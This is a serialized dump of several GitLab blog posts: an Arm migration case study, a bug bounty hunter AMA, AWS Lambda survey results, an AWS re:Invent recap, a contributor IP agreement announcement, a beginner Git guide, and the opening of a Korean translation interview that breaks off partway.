“Our engineering teams can be quite demanding of the infrastructure provided. They are very, very particular.”\n\nSince the teams have been migrated onto GitLab, “they have been full of praise,” which was a pleasant surprise for Dean Arnold, Arm’s DevOps lead for the open source engineering org, Wafaa says, “because he's not used to getting praise from them. It stood up and worked really well for them.”\n\nMigration to GitLab is ongoing with about 90 percent of it complete. “Certain projects are taking longer because they have complex tooling and the integration pieces are still being ironed out,” Wafaa says.\n\nWith the adoption of GitLab, Arm’s Open Source Engineering teams can now offer full end-to-end native development, and can confidently say “software development by Arm, for Arm, on Arm”. GitLab is not just a DevOps tool, it is a tool that helps companies like Arm offer a complete developer experience.\n\n## Solid metrics for Arm\n\nWith GitLab, Arm has found a number of benefits:\n- Ease of CI/CD set up and integration\n- Cost savings of between 15% and 20%\n- Time savings of an average two to four people a month on admin work\n- Tool simplification\n- The ability to share and collaborate on pipelines/code\n- Quick setup of new projects and onboarding of teams\n\nPreviously, there were multiple individual components that would have to be then stitched together, Wafaa says. “GitLab actually offers us more features and more functionality than we're necessarily used to, and that’s great.”\n\nThat’s especially useful because other contributors want to use pretty much every feature possible for their projects, both for corporate and personal use. 
For example, one engineer uses GitLab in a personal capacity and wants full CI capabilities.\n\nBoth Wafaa and Arnold are confident that once the migration is completed, there will be significant time savings and projects will be onboarded quickly.\n\n## Deployment in the clouds\n\nOn tap now is working through how to share parts of the pipelines so that teams can adopt things quicker, Arnold says. By the time the migration is completed, Arm will have most of what contributors need, he says.\n\nRight now, Arm is using AWS EC2 instances. Looking ahead, Arnold envisions that [deployment between cloud providers](/topics/multicloud/) will become more seamless without having to change underlying code.\n\nSays Wafaa, “Once we've got people fully onto GitLab, then we'll look at how we can expand it and perhaps provide a more robust level of redundancy across geographies via the containerized route. This is an area of ongoing collaboration between Arm and GitLab, and we hope to be able to deploy soon.”",[974,9,685],"customers",{"slug":976,"featured":6,"template":689},"arm-open-source-makes-a-seamless-migration-to-gitlab","content:en-us:blog:arm-open-source-makes-a-seamless-migration-to-gitlab.yml","Arm Open Source Makes A Seamless Migration To Gitlab","en-us/blog/arm-open-source-makes-a-seamless-migration-to-gitlab.yml","en-us/blog/arm-open-source-makes-a-seamless-migration-to-gitlab",{"_path":982,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":983,"content":989,"config":996,"_id":998,"_type":14,"title":999,"_source":16,"_file":1000,"_stem":1001,"_extension":19},"/en-us/blog/ask-a-hacker-a-conversation-with-ahacker1",{"title":984,"description":985,"ogTitle":984,"ogDescription":985,"noIndex":6,"ogImage":986,"ogUrl":987,"ogSiteName":673,"ogType":674,"canonicalUrls":987,"schema":988},"Ask a hacker: A conversation with ahacker1","Alexander Siyou Tan, also known as ahacker1, joined us for an AMA to discuss how he got into hacking and some of his best bug bounty hunting 
strategies.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750098255/Blog/Hero%20Images/Blog/Hero%20Images/blog-image-template-1800x945%20%282%29_5kE1qyriiwHs6cpvIwuyB_1750098255490.png","https://about.gitlab.com/blog/ask-a-hacker-a-conversation-with-ahacker1","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Ask a hacker: A conversation with ahacker1\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ottilia Westerlund\"}],\n        \"datePublished\": \"2024-12-12\",\n      }",{"title":984,"description":985,"authors":990,"heroImage":986,"date":992,"body":993,"category":10,"tags":994},[991],"Ottilia Westerlund","2024-12-12","At GitLab we have a tradition: Every year, we invite a bug bounty hunter to join us for an AMA. This year, we met with Alexander Siyou Tan, also known as [ahacker1](https://hackerone.com/ahacker1?type=user), and did a deep dive into all aspects of bug bounty hunting.\n\n## About Alexander (ahacker1)\n\nAlexander is passionate about hacking complex SaaS applications, with a particular interest in authorization-based vulnerabilities. Currently, he's focusing on [SAML and SSO](https://about.gitlab.com/blog/the-ultimate-guide-to-enabling-saml/) research. His hacking journey began during the Covid-19 pandemic, when he transitioned from gaming to exploring game hacks and easter eggs.\n\n## Highlights from the AMA\n\nHere are some of the questions AMA attendees asked Alexander, and his responses.\n\n**What are the tools you use in your research?**\n\nI use RubyMine as my IDE, as I find it helps with analyzing code. You can jump to  different parts of the code, and that helps with efficiency and allows you to search quickly and determine interesting behavior. I used to just use BurpSuite, but not so much anymore. 
I mainly focus on using JetBrains to review repositories on GitLab.\n\n**Have you explored using AI to assist in finding and/or exploiting vulnerabilities?**\n\nYes! When I learn about a new feature or subject, I may ask ChatGPT how it works. It may give some insights or leads – when I do SAML research I use it.\n\n**Tell us about moving into SAML and the experience of finding the awesome bugs in that area.**\n\nSAML is like a SaaS application within a SaaS application. There's a 100-page document on how SAML works, offering infinite possibilities. I focus on code analysis, reviewing the approximately 20 libraries available. While hacking SAML can be time-consuming due to setup and configuration, the payoff can be significant.\n\n**What’s next after SAML? Will you keep digging?**\n\nI will fix SAML. I want to fix libraries. Not sure what’s next - maybe SSO stuff!\n\n### Alexander's tips for the GitLab Bug Bounty Program\n\nAlexander offered the following advice for those interested in GitLab's Bug Bounty Program:\n\n1. Leverage GitLab's open source nature for code analysis.\n2. Study patch releases to learn reverse-engineering techniques.\n3. Review GitLab's public issues and disclosed reports for insights.\n\n### Getting to know our hacker\n\n**What do you do when you don't hack?**\n\nI play games, I also go out on walks and explore nature/hike. It’s a nice break from sitting at the computer.\n\n**How long do you think you would survive in a zombie apocalypse?**\n\nNot long. Without the internet, I don’t think I'd be able to adapt.\n\n**Is cereal a type of soup?**\n\nIt most definitely is. 
It has both liquid and food in it.\n\n## Watch the replay\n\nFor those interested in the full AMA, check out the YouTube live playback.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/EPV0eNOOfv4?si=byNqXWKZzZLXfLfW\" title=\"GitLab Ask a Hacker AMA with Alexander Siyou Tan (@ahacker1)\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nWe extend our gratitude to all participants and, of course, to Alexander for sharing his insights. Keep up with Alexander's latest activities on his [HackerOne profile](https://hackerone.com/ahacker1).\n\n## More \"Ask a Hacker\" AMAs\n\n- [Ask a hacker - 0xn3va](https://about.gitlab.com/blog/ask-a-hacker/)\n- [Ask a hacker - ajxchapman](https://about.gitlab.com/blog/ajxchapman-ask-a-hacker/)\n- [Ask a hacker - rpadovani](https://about.gitlab.com/blog/rpadovani-ask-a-hacker/)\n\n## About the GitLab Bug Bounty Program\n\nThe GitLab Bug Bounty Program aims to enhance the security of our products and services. 
Managed by our Application Security team, the program has achieved significant milestones since its public launch in December 2018, including:\n\n* Resolved 1,684 reports\n* Awarded over $4.7 million in bounties\n* Thanked 655 hackers for their findings\n\n> Learn more about the [GitLab Bug Bounty Program](https://hackerone.com/gitlab).\n",[995,865,9,267],"bug bounty",{"slug":997,"featured":91,"template":689},"ask-a-hacker-a-conversation-with-ahacker1","content:en-us:blog:ask-a-hacker-a-conversation-with-ahacker1.yml","Ask A Hacker A Conversation With Ahacker1","en-us/blog/ask-a-hacker-a-conversation-with-ahacker1.yml","en-us/blog/ask-a-hacker-a-conversation-with-ahacker1",{"_path":1003,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1004,"content":1010,"config":1016,"_id":1018,"_type":14,"title":1019,"_source":16,"_file":1020,"_stem":1021,"_extension":19},"/en-us/blog/aws-lambda-usage-stats",{"title":1005,"description":1006,"ogTitle":1005,"ogDescription":1006,"noIndex":6,"ogImage":1007,"ogUrl":1008,"ogSiteName":673,"ogType":674,"canonicalUrls":1008,"schema":1009},"AWS Lambda usage survey results","The results of our quick AWS Lambda usage survey","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664102/Blog/Hero%20Images/gitlab-values-cover.png","https://about.gitlab.com/blog/aws-lambda-usage-stats","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"AWS Lambda usage survey results\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Viktor Nagy\"}],\n        \"datePublished\": \"2019-11-27\",\n      }",{"title":1005,"description":1006,"authors":1011,"heroImage":1007,"date":1013,"body":1014,"category":10,"tags":1015},[1012],"Viktor Nagy","2019-11-27","\nThis blog post was originally published on the GitLab Unfiltered blog. 
It was reviewed and republished on 2019-12-03.\n{: .alert .alert-info .note}\n\nIn early October, I asked the community to [share your AWS Lambda tooling habits](https://forms.gle/9xhjaPxKdZsHDs2V9), so we can better serve your needs from within GitLab. This blog post presents the results of that survey. The survey was shared on Reddit, some Facebook Groups, and on the GitLab Twitter and Facebook channels. All told we received 58 responses which makes the results thought-provoking, but certainly not conclusive. \n\n## Intro\n\nSo, what did I ask you about? I had a few assumptions in mind when I put together the survey.\n\n- Lambda is mostly used by developers, but - at least in the enterprise - ops people might be involved too, because of monitoring or security.\n- There are differences between hobby and professional usage, and I wanted to be able to try to filter out hobby users.\n- Serverless has an adoption path in the enterprise. This might result in it being used only for backoffice scripts at first. So I wanted to know if it's used in production or backoffice scripting only.\n\nBesides testing these assumptions, I wanted to learn about usage habits with respect to:\n\n- Frameworks used (if any)\n- Testing tools and approaches used\n- CI/CD tools used\n- Monitoring and debugging tools and approaches followed\n\nWho answered the survey?\n{: .note.text-center}\n\n![User role](https://about.gitlab.com/images/blogimages/aws-lambda-survey-2019/aws-population.png)\n\n## How do we write code for AWS Lambda\n\nThe first interesting topic was what frameworks were being used for AWS Lambda. It was possible to select multiple options and responders could even provide a free text answer.\n\n![Company size](https://about.gitlab.com/images/blogimages/aws-lambda-survey-2019/aws-frameworks.png){: .small.left.wrap-text}\n\nAs many responders chose more than just a single option, we should look a bit behind the data to understand more. 
From that you can see that the [serverless framework](/topics/serverless/) is popular with these respondents and its use is  wide-spread. The *Other* section is quite scattered and there are no other big players; responses included Zappa, Chalice, Netlify function, etc. \n\nI thought that there might be differences once I controlled for the company size. I expected more Terraform and less CLI usage as the company size increases. I didn't look into statistical significance, but a simple eye-ball test shows that SMBs are going heads down with tech stacks. They are the strongest users of both serverless and Terraform. I'd say that enterprise users try to follow along, but have a quite big direct usage of AWS CLI too. Why might this be true? A few scenarios come to mind that can think about:\n\n- Enterprises are lagging in terms of technology adoption, thus their Terraform usage is lower\n- They use AWS CLI more extensively as the serverless framework can't fulfill all their use cases\n- Possibly we don't have enough data and with a stronger analysis it would turn out that there are no differences\n\n## What about testing\n\nWhen asked about the challenges serverless technologies pose one topic repeatedly arose: the lack of good testing infrastructure.\n\nAt GitLab we strive to provide outstanding CI/CD capabilities for testing. We also work hard to spread best practices. \n\nI asked the community about the current approaches they take to CI/CD and testing. Here again, multiple answers were allowed.\n\n![Company size](https://about.gitlab.com/images/blogimages/aws-lambda-survey-2019/aws-testing.png){: .small.right.wrap-text}\n\nThis pie chart is filtered to show only non-hobby projects. Even here, almost every fifth project has no testing at all! 
Otherwise, we can barely speak about test pyramids here as the majority of the projects either don't run any tests or run only unit tests.\n\nGetting into the data by company size, we see what we would expect: as the company size grows, testing becomes more important.\n\n## CI/CD bias\n\nThe survey also contained a question about which CI/CD tools are being used. I skipped the analysis here. As the survey was mostly shared by GitLab team members, and through GitLab channels, clearly the majority of responders use GitLab. A wise choice! \n\n## Monitoring\n\nAlongside developing and deploying software, thinking about its operational health in production is just as important. This led me to ask a few questions on Lambda monitoring habits.\n\n![Company size](https://about.gitlab.com/images/blogimages/aws-lambda-survey-2019/aws-monitoring.png){: .small.left.wrap-text}\n\nEven given the small sample size, I was surprised the vast majority choose AWS CloudWatch. I expected most production environments would use more advanced instrumentation, and I was wrong.\n\nA related question I asked is, \"What metrics are you most interested in?\" This was a free-text answer. There were no surprises here with \"error rates\" coming out as the clear winner.\n\n## Conclusion\n\nBased on the survey it became clear that even today, GitLab can be used very well with AWS Lambda. To make getting started easy, we've created a project template that uses GitLab Pages to host the frontend of your app, and AWS Lambda for your backend needs. Besides the basic hosting needs, our templates have `serverless-offline` support added, so you can start writing tests against it without any additional setup needed. 
You can easily begin by starting a [new project using the Serverless Framework/JS template](https://gitlab.com/projects/new).\n\n![Easy getting started with project templates](https://about.gitlab.com/images/blogimages/aws-lambda-survey-2019/aws-project-template.png){: .medium}\n\nThese were the insights I gathered about the data. Because this data was provided by the community, I'm making it available to everyone. You can [download the responses as a csv](/images/blogimages/aws-lambda-survey-2019/aws-lambda-survey-responses.csv). In case you are serious about Serverless usage in production, I'd love to hear your insights! Feel free to [reach out to me](https://gitlab.com/nagyv.gitlab)!\n",[267,9,231],{"slug":1017,"featured":6,"template":689},"aws-lambda-usage-stats","content:en-us:blog:aws-lambda-usage-stats.yml","Aws Lambda Usage Stats","en-us/blog/aws-lambda-usage-stats.yml","en-us/blog/aws-lambda-usage-stats",{"_path":1023,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1024,"content":1030,"config":1039,"_id":1041,"_type":14,"title":1042,"_source":16,"_file":1043,"_stem":1044,"_extension":19},"/en-us/blog/aws-reinvent-recap",{"title":1025,"description":1026,"ogTitle":1025,"ogDescription":1026,"noIndex":6,"ogImage":1027,"ogUrl":1028,"ogSiteName":673,"ogType":674,"canonicalUrls":1028,"schema":1029},"Highlights from AWS re:Invent 2018","Catch up on what GitLab got up to at AWS re:Invent last week! 
Reinventing pipelines, emerging as a single application, theCUBE interviews, and more.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679994/Blog/Hero%20Images/aws_booth_2018.jpg","https://about.gitlab.com/blog/aws-reinvent-recap","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Highlights from AWS re:Invent 2018\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Priyanka Sharma\"}],\n        \"datePublished\": \"2018-12-06\",\n      }",{"title":1025,"description":1026,"authors":1031,"heroImage":1027,"date":1033,"body":1034,"category":299,"tags":1035},[1032],"Priyanka Sharma","2018-12-06","\n\nLast week GitLab was at AWS re:Invent 2018, the marquee event for cloud computing in the US. As the frontrunner in the space, Amazon has built re:Invent to be a juggernaut. This year it commanded most of the Las Vegas strip and had over 50,000 attendees. As a first-time visitor myself, I was impressed by the sheer scale and efficiency of the event. I was also thrilled to achieve my personal goal of giving my first talk with a live demo using code and GitLab. As for GitLab, we saw that our company emerged as a leader in the DevOps space with a single application for the whole software development lifecycle.\n\n## Highlights\n\n### Reinventing CI/CD pipelines\n\nOur CEO [Sid Sijbrandij](/company/team/#sytses) and I did a talk and live demo about reinventing CI/CD pipelines using GitLab, [Kubernetes](/solutions/kubernetes/), and EKS. This was our first hint that this re:Invent was going to be special. The talk was bursting at the seams with attendees, as we shared both the challenges of the toolchain crisis engulfing our ecosystem, and about how a single application for the entire DevOps lifecycle can make an improvement of over 200 percent in cycle times. 
You can [check out the presentation here](https://docs.google.com/presentation/d/1x1g4pfpoaav9lhcYkjAJylLMl-9S0JFTeKXlNF98O-I/edit?usp=sharing).\n\n![Sid Sijbrandij and Priyanka Sharma on stage at AWS re:Invent](https://about.gitlab.com/images/blogimages/aws-2018/aws_2018_sid_talk_stage.jpeg){: .shadow.medium.center}\n\nThe demo, which showed us running a CI/CD pipeline and deploying code to Kubernetes on EKS, is an example of the [cloud native workflows](/topics/cloud-native/) users can push via GitLab. It is such competency that makes Kubernetes on EKS a breeze and is the reason GitLab was awarded the [AWS Partner DevOps Competency Certification](/blog/gitlab-achieves-aws-devops-competency-certification/) to confirm our viability and excellence as a DevOps solution for companies using AWS Cloud.\n\n### Validation for our vision\n\nOur experience at re:Invent was one of validation and emergence. As a company, we saw that our efforts to build the first single application for the entire DevOps lifecycle have paid off and our users resonated with our message. Most folks who came to our booth were aware that GitLab played a part in multiple stages (if not all) of their workflow and many were avid [GitLab CI](/solutions/continuous-integration/) fans. Gone are the days when [version control](https://docs.gitlab.com/ee/topics/gitlab_flow.html) was the only thing GitLab was associated with.\n\n![Collage from GitLab at AWS re:Invent](https://about.gitlab.com/images/blogimages/aws-2018/aws_booth_collage.jpeg){: .medium.center}\n\nOur VP of Alliances, [Brandon Jung](/company/team/#brandoncjung), [appeared on theCUBE](https://www.youtube.com/watch?v=Ejs5xGAhL8s) with a company called Beacon. As the former head of partnerships at Google Cloud, Brandon has a long history with GitLab. He has seen the company grow over the years and shared how our rocketship ascent across the DevOps lifecycle convinced him of the potential. 
He said, \"In just over two years, [GitLab became the frontrunner for continuous integration](/blog/gitlab-leader-continuous-integration-forrester-wave/), according to Forrester. That's impressive.\"\n\n### Livestream with The New Stack\n\nI also represented GitLab on [a livestream podcast](https://www.pscp.tv/w/1eaJbODAepnxX) with [The New Stack](https://thenewstack.io/), [Matt Biilmann](https://twitter.com/biilmann?lang=en), CEO of [Netlify](/blog/netlify-launches-gitlab-support/), and [Joe Beda](https://twitter.com/jbeda), founder of [Heptio](https://heptio.com/) and creator of Kubernetes. We discussed GitOps, NoOps, and the toolchain crisis. As Matt wisely said, \"Trust in open source is critical to cloud computing and the ecosystem. Companies like GitLab will keep the players honest.\"\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">GitOps, NoOps and the tool chain crisis. \u003Ca href=\"https://t.co/mtfm8OaYYD\">https://t.co/mtfm8OaYYD\u003C/a>\u003C/p>&mdash; The New Stack (@thenewstack) \u003Ca href=\"https://twitter.com/thenewstack/status/1067881587214184448?ref_src=twsrc%5Etfw\">November 28, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\nWe thank AWS for creating this amazing ecosystem of end users and practitioners who came together in Vegas last week. Next year will be bigger, better. Until then, see you all at [KubeCon](/events/)! 
😃\n",[1036,267,1037,277,930,1038,803,9],"CI","demo","kubernetes",{"slug":1040,"featured":6,"template":689},"aws-reinvent-recap","content:en-us:blog:aws-reinvent-recap.yml","Aws Reinvent Recap","en-us/blog/aws-reinvent-recap.yml","en-us/blog/aws-reinvent-recap",{"_path":1046,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1047,"content":1052,"config":1058,"_id":1060,"_type":14,"title":1061,"_source":16,"_file":1062,"_stem":1063,"_extension":19},"/en-us/blog/balanced-piaa",{"title":1048,"description":1049,"ogTitle":1048,"ogDescription":1049,"noIndex":6,"ogImage":900,"ogUrl":1050,"ogSiteName":673,"ogType":674,"canonicalUrls":1050,"schema":1051},"Announcing a more balanced Proprietary Information and Assignment Agreement","We've amended our PIAA to help our contributors maintain their ability to work on projects that are unrelated to GitLab business, including other open source projects.","https://about.gitlab.com/blog/balanced-piaa","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Announcing a more balanced Proprietary Information and Assignment Agreement\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jamie Hurewitz\"}],\n        \"datePublished\": \"2017-12-18\",\n      }",{"title":1048,"description":1049,"authors":1053,"heroImage":900,"date":1055,"body":1056,"category":299,"tags":1057},[1054],"Jamie Hurewitz","2017-12-18","\n\nWe recently [switched from a Contributor License Agreement (CLA) to a Developer's Certificate of\nOrigin (DCO)](/blog/gitlab-switches-to-dco-license/)\nto make it easier for everyone to contribute to GitLab. Now, we're taking our commitment to\nour core tenet, \"everyone can contribute,\" a step further. 
We're amending our Proprietary\nInformation and Assignment Agreement (PIAA) and putting clarifying processes in\nplace to help our contributors maintain their ability to work on projects that\nare unrelated to GitLab's business, including other open source projects.\n\n\u003C!-- more -->\n\nGitHub [announced the Balanced Employee Intellectual Property Agreement](https://github.com/blog/2337-work-life-balance-in-employee-intellectual-property-agreements)\n(BEIPA), an open source intellectual property (IP) agreement which seeks to take\na more balanced approach to assigning control over IP. We want to\nthank GitHub for taking the lead on a very important conversation. Their new\napproach inspired us to take a closer look at our own PIAA, make improvements to better clarify our\nposition, and encourage our contributors to work on projects outside of GitLab if they want to.\n\nWe [recently launched a Twitter poll](https://twitter.com/gitlab/status/938921270913019904)\nto assess the potential risk IP agreements pose to developers in our community.\nWe found that the majority of developers (85 percent) have a side project and nearly half\n(44 percent) have worried about the IP ownership of that project. Forty-four percent\nsay they have used company resources for a side project, potentially putting them\nat risk of violating their workplace IP agreement.\n\nAt GitLab, we want to give our contributors confidence that their developments\nwill *not* be owned by GitLab simply by virtue of their use of GitLab-issued computers,\nGitLab facilities, or the GitLab source code repository. Furthermore, we want to\nalleviate stress of not knowing whether they are in violation, given that there\nis necessarily some ambiguity about which projects relate to or don't relate to\nour business. 
So, we are making some changes.\n\nOne of [our values is boring solutions](https://handbook.gitlab.com/handbook/values/#efficiency).\nWith this in mind we looked at either adopting the BEIPA outright or contributing\nto the document. After considerable thought we concluded that it wasn’t possible\nto make either of these approaches work. Accordingly, we focused on improving our\nexisting PIAA.\n\n## Why the change?\n\nThe industry standard for intellectual property agreements tends to assign a broad\nswath of IP to the employer, making it difficult for a contributor to work on\noutside projects without being in violation of the agreement. The most important\npiece of any employee agreement is the definition of what IP is assigned from the\nemployee to the company.\n\nThe industry standard is to define the scope of the IP definition in three buckets:\n\n1. IP that relates to the current or prospective business of the company\n2. IP created by the employee as part of their work for the company\n3. IP created using materials, facilities, funding, or confidential information of the company\n\nWe want to alleviate the unnecessary risks posed to contributors by buckets 1 and 3 above.\n\n## What's changing\n\nAs a result of our internal review, we are making three important changes to our PIAA\nand processes related to outside creations developed by our contributors:\n\n1. We have entirely eliminated the section in our PIAA that would grant GitLab ownership\nin developments simply by virtue of the use of GitLab equipment, including\nGitLab-issued computers, GitLab facilities, or GitLab.com as a software\ndevelopment platform.\n\n2. In the event there is concern on our contributor’s behalf that there may be a gray\narea, we have created a process whereby GitLab can confirm that the development is\noutside the scope of GitLab’s business.\n\n3. 
We have [added plain language text to our publicly viewable Handbook](/handbook/people-group/contracts-probation-periods/#approval-for-outside-projects) that clarifies\nwhen contributors should seek further assurances from GitLab and when\nthey shouldn’t.  \n\nOur goal is to give contributors a way to gain confidence in their ability to pursue\nindependent projects ahead of time, and reduce the risk of potential conflicts down the line.\n",[930,9,803],{"slug":1059,"featured":6,"template":689},"balanced-piaa","content:en-us:blog:balanced-piaa.yml","Balanced Piaa","en-us/blog/balanced-piaa.yml","en-us/blog/balanced-piaa",{"_path":1065,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1066,"content":1072,"config":1079,"_id":1081,"_type":14,"title":1082,"_source":16,"_file":1083,"_stem":1084,"_extension":19},"/en-us/blog/beginner-git-guide",{"title":1067,"description":1068,"ogTitle":1067,"ogDescription":1068,"noIndex":6,"ogImage":1069,"ogUrl":1070,"ogSiteName":673,"ogType":674,"canonicalUrls":1070,"schema":1071},"A guide to Git for beginners","Our senior developer evangelist answers newbie questions about Git.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681222/Blog/Hero%20Images/git-15th-anniversary-cover.png","https://about.gitlab.com/blog/beginner-git-guide","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A guide to Git for beginners\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Brendan O'Leary\"}],\n        \"datePublished\": \"2020-04-13\",\n      }",{"title":1067,"description":1068,"authors":1073,"heroImage":1069,"date":1075,"body":1076,"category":682,"tags":1077},[1074],"Brendan O'Leary","2020-04-13","\n\n_If you're just learning about software development, or are brand new to open source, it won't be long before you encounter Git, a source code management tool and arguably one of the most successful open source projects ever. 
We asked senior developer evangelist [Brendan O'Leary](/company/team/#brendan) to fill in the background on Git's history and successes in honor of its 15th anniversary._\n\n## What is source code management?\n\nBefore you start in software engineering it's important to understand the concept of [source code management](/solutions/source-code-management/). In its simplest form software is a bunch of text files and if I'm using those by myself it's not a big deal. But when multiple people use multiple files it gets out of hand and you need some way to manage it all. Humans can't necessarily manage all of that easily: If you're working with files A and C and I'm working with C and D, you need a way to bring all the changes we've made together without overriding anything or causing any conflict. A computer can more easily figure that out, and in a nutshell, that's what source code management is.\n\n## Why the term Git?\n\nThere are several different urban legends about this. Linus Torvalds who wrote it is a pretty gruff person [with some acknowledged sharp edges](https://www.newyorker.com/science/elements/after-years-of-abusive-e-mails-the-creator-of-linux-steps-aside). And so the story suggests he actually named it after himself, as in the British slang word, [“git”](https://www.merriam-webster.com/dictionary/git). That may be apocryphal. Also, it's a three-letter combo, meaning it's short and didn't conflict with any existing Unix commands. Now people say it stands for “Global Information Tracker” or “GD Idiot Truckload of...” if you're mad at it.\n\n## But wait. Who is Linus Torvalds?\n\nLinus Torvalds is a Finnish-American software engineer who developed the [Linux kernel](https://www.howtogeek.com/howto/31632/what-is-the-linux-kernel-and-what-does-it-do/) and then invented Git 15 years ago. 
Torvalds has been quoted as saying he's more \"famous\" for Linux but that over time, Git will [end up being more important](https://www.techrepublic.com/article/linus-torvalds-git-proved-i-could-be-more-than-a-one-hit-wonder/). Torvalds is also widely seen as the godfather of the open source movement.\n\n## Can you explain the rationale behind the cult following of open source?\n\nTorvalds himself has a cult following and open source has been around for a very long time, long before Git was invented. But open source wasn't widely accepted and in some cases, companies were actively hostile to the concept. Torvalds wanted to create a project everyone could contribute to and Git was born (literally developed by Torvalds over a weekend 15 years ago). Git solved a problem that was common across all types of software development and it not only welcomed contributions from users, it _needed_ contributions to grow. The idea of a practical solution everyone could contribute to created a kind of zeitgeist, and today open source is widely embraced as a result.\n\n## How could I explain Git to my neighbor?\n\nWe tend to talk about Git as a tree but I really don't know if that is the best analogy for it. It's a tree in the sense that it makes branches, but then those branches come back together and that doesn't happen in a tree.\n\nInstead, I'd say Git is like a time machine. The whole history of everything that happened on any branch in alternate timelines is brought back together magically. Nothing is lost or changed and you can look backward and move forward. It's magic.\n\n## What's the most important thing I should know about Git?\n\nThat's easy: You can't break it!\n\nBecause it's a magical time machine you really can't do anything to it that can't be fixed. So I always tell beginners to relax and play around with your copy. 
No matter how many mistakes you make you can't break it in a way that's not fixable.\n\nHave no fear.\n",[751,9,1078],"careers",{"slug":1080,"featured":6,"template":689},"beginner-git-guide","content:en-us:blog:beginner-git-guide.yml","Beginner Git Guide","en-us/blog/beginner-git-guide.yml","en-us/blog/beginner-git-guide",{"_path":1086,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1087,"content":1093,"config":1100,"_id":1102,"_type":14,"title":1103,"_source":16,"_file":1104,"_stem":1105,"_extension":19},"/en-us/blog/behind-the-scenes-of-gitlab-korean-translation",{"title":1088,"description":1089,"ogTitle":1088,"ogDescription":1089,"noIndex":6,"ogImage":1090,"ogUrl":1091,"ogSiteName":673,"ogType":674,"canonicalUrls":1091,"schema":1092},"Behind the scenes of GitLab's Korean translation","How a student project helped maintain linguistic consistency and deliver a unified user experience for the Korean GitLab community.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664472/Blog/Hero%20Images/gitlabflatlogomap.png","https://about.gitlab.com/blog/behind-the-scenes-of-gitlab-korean-translation","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Behind the scenes of GitLab's Korean translation\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Inchul Yoo, Sunjung Park\"}],\n        \"datePublished\": \"2023-10-05\",\n      }",{"title":1088,"description":1089,"authors":1094,"heroImage":1090,"date":1096,"body":1097,"category":10,"tags":1098},[1095],"Inchul Yoo, Sunjung Park","2023-10-05","\nGitLab is translated into many languages by community members, ensuring our product reaches a much wider audience. In recent months, software and computer engineering students from Ajou University in South Korea contributed translations as part of their classroom project, led by Prof. Hwanyong Lee. 
Their contributions, together with many other members of our community, resulted in [100% of strings in the GitLab UI being translated into Korean](https://translate.gitlab.com/project/gitlab-ee/ko). \n\n![photo of Korean translation contributors](https://about.gitlab.com/images/blogimages/translation-contributors-swag.jpg){: .medium.center}\n\nIn this blog post, [Inchul Yoo](https://gitlab.com/iyoo), solutions architect at GitLab, and [Sunjung Park](https://gitlab.com/sunjungp), senior product designer at GitLab, who also volunteer as proofreaders for the Korean translation of GitLab in the [GitLab Crowdin project](https://crowdin.com/project/gitlab-ee), had the privilege to interview Prof. Lee. He shared the students' experience in contributing to GitLab and discussed areas where additional collaboration is needed for translation.\n\nThank you for your contributions to GitLab: \n- Dahee Kim (김다희, 아주대학교)\n- Myeong Seok Nam (남명석, 아주대학교)\n- Jongho Baik (백종호, 아주대학교)\n- Seoyoung Lee (이서영, 아주대학교)\n- Sungmin Lee (이승민, 아주대학교)\n- Jaeyoon Lee (이재윤, 아주대학교)\n- Hwanyong Lee (이환용 교수, 아주대학교)\n\n## Interview with Prof. Hwanyong Lee\n\n**Could you tell us about Ajou University and the department?**\n\nAjou University aims to cultivate software talents with diverse roles in the field of software as its primary focus. Using GitLab, students have opportunities to learn through practical experience covering most aspects of the DevOps lifecycle, including issue management, version control, building, and deploying software.\n\n**When did you start using GitLab, and for what purpose?**\n\nSince 2018, when Ajou University became a software-focused institution, we started to utilize GitLab for educational purposes, including tasks such as assignments and submissions. 
Currently, our GitLab instance hosts over 9,000 projects and serves more than 2,200 students.\n\n**What motivated you to translate all of GitLab's product interface text into Korean?**\n\nOutside of my professional responsibilities, I have been actively contributing to diverse open source projects. Given my role as a professor, I saw an opportunity to underscore the significance of open source contributions to my students and inspire them to engage in such activities. During this semester, I established the objective of involving students in open source projects, specifically focusing on Korean localization. Remarkably, more than 10 students eagerly volunteered to participate in the translation efforts of more than 10 open source projects into Korean.\n\n**How many students participated in the GitLab translation project, and how long did it take?**\n\nThere were seven students in total, both majoring and minoring in software and computer engineering. We distributed the tasks among them to collaborate on the project. The entire project was completed in approximately half a semester, which took about two months.\n\n**Each student may have different translations for the same words. How did you handle this?**\n\nWe managed this by creating our own glossary 